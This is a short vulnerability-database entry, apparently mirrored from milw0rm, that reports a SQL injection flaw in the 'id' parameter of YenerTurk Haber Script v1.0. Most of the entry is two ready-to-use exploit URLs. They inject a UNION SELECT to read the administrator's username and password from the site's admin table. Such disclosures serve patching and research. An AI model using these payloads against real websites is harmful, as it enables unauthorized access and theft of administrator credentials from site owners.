Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13824
HistoryAug 09, 2006 - 12:00 a.m.

[SA21397] YenerTurk Haber Script "id" SQL Injection Vulnerability

2006-08-0900:00:00
vulners.com
14

#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
#Credit:ASIANEAGLE
#Contact:[email protected]

#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201

milw0rm.com [2006-08-07]